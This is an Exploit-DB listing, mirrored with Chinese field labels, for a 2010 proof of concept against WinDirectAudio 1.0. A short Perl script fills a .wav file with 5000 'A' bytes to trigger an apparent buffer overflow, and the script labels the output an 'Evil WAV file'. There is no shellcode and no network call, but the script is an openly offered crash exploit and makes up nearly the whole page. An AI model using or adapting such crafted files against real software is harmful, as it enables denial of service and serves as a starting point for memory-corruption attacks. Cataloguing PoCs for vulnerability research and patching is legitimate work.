WinDirectAudio 1.0 – ‘.wav’ (PoC)

  • 作者: ahwak2000
    日期: 2010-05-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12687/
  • #/usr/bin/perl
    #Title: WinDirectAudio(.WAV) PoC
    #[+]Date : May 21,2010 
    #[+]version: v1.0
    #[+]Author : ahwak2000
    #[+]Contact: z.u5[at]hotmail.com
    #[+]Geetz [2]: germaya_x
    #[+]tested on: windows xp sp2&sp3 EN
    #########################################
    my $junk = "\x41" x 5000;
    open(myfile,'>> ahwak2000.wav');
    print myfile $junk."\r\n";
    print "\nEvil WAV file created successfully.";